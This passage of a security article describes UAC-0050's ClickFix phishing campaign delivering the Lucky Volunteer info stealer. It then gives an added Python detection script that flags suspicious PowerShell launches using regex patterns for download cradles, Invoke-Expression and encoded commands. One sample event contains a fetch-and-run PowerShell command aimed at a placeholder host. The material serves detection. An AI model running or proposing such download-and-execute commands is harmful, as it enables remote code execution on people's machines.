Even cyber-espionage groups appear to have adopted the ClickFix approach. Toward the end of October, an APT group tracked as UAC-0050 that has a history of targeting organizations from Ukraine launched a phishing campaign in Ukrainian that used fake notifications about shared documents to direct users to an attacker-controlled website. The website used the combination of reCAPTCHA Phish and ClickFix to trick users into running PowerShell as part of a CAPTCHA challenge. The code deployed a rarely used info stealer dubbed Lucky Volunteer.
Mitigation
Installed on Windows by default, PowerShell is a very powerful scripting language and environment designed to simplify and automate system administration tasks. Because of its wide adoption in malware attacks over the past 10 years, security products monitor for potentially malicious PowerShell invocations.
However, they usually look for instances where PowerShell scripts are being executed by other processes, because that’s how PowerShell is typically abused — as part of a larger attack chain, such as being launched by malicious Microsoft Word macros, or a malware dropper downloading and executing a malicious PowerShell script to deploy additional payloads.
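The parent-process heuristic described above is easy to see in code. The following added example (not from the article or any vendor product) triages PowerShell process-creation events by parent image and command-line indicators, and distinguishes the classic "spawned by Word" chain from a user-launched instance whose parent is explorer.exe, which is what a ClickFix-style paste into the Run dialog looks like. The event records, field names and thresholds are constructed assumptions, loosely modelled on Sysmon Event ID 1 fields, not data from the page.

```python
import re
from dataclasses import dataclass

# Constructed, Sysmon-like process-creation record (field names are assumptions).
@dataclass
class ProcCreate:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the created process

# Parents that commonly launch PowerShell as part of a larger attack chain
# (Office macros, script hosts). This list is an illustrative assumption.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}
# A parent consistent with the user launching PowerShell themselves
# (e.g. pasting into the Run dialog), which parent-only rules tend to ignore.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Command-line indicators, checked case-insensitively.
CMDLINE_INDICATORS = [
    (r"-(?:e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod",
     "download cradle"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"-nop\b|-noprofile", "no profile"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
]

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def is_powershell(image: str) -> bool:
    return basename(image) in {"powershell.exe", "pwsh.exe"}

def triage(ev: ProcCreate):
    """Score one event. Returns None for non-PowerShell processes, otherwise
    a dict with a severity and the reasons that produced it."""
    if not is_powershell(ev.image):
        return None
    parent = basename(ev.parent_image)
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
    indicators = [label for pat, label in CMDLINE_INDICATORS
                  if re.search(pat, ev.command_line, re.IGNORECASE)]
    reasons.extend(indicators)
    if parent in USER_LAUNCH_PARENTS:
        reasons.append(f"user-launched ({parent} parent)")

    # Severity: a suspicious parent is enough on its own; a user-launched
    # instance needs command-line evidence before it is worth an alert.
    if parent in SUSPICIOUS_PARENTS:
        severity = "high"
    elif len(indicators) >= 2:
        severity = "medium"
    elif len(indicators) == 1:
        severity = "low"
    else:
        severity = "info"
    return {"severity": severity, "reasons": reasons}

# Constructed sample events (paths and command lines are made up for the demo).
SAMPLE_EVENTS = [
    ProcCreate(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               "powershell.exe -nop -w hidden -enc AAAAAAAAAAAA"),
    ProcCreate(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Windows\explorer.exe",
               'powershell.exe -w hidden -c "iwr http://example.invalid/x | iex"'),
    ProcCreate(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Windows\explorer.exe",
               "powershell.exe"),
    ProcCreate(r"C:\Windows\System32\notepad.exe",
               r"C:\Windows\System32\svchost.exe",
               "notepad.exe"),
]

def triage_samples():
    """Run triage over the constructed events and return the results in order."""
    return [triage(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for ev, result in zip(SAMPLE_EVENTS, triage_samples()):
        print(basename(ev.parent_image), "->", basename(ev.image), result)
```

The second sample is the interesting one: a parent-only rule sees explorer.exe and moves on, while the command line (hidden window, download cradle, Invoke-Expression) still carries enough evidence to alert. In production the same logic belongs in the EDR or SIEM query language rather than a script, but the shape of the rule is the same: combine parent lineage with command-line content instead of relying on either alone.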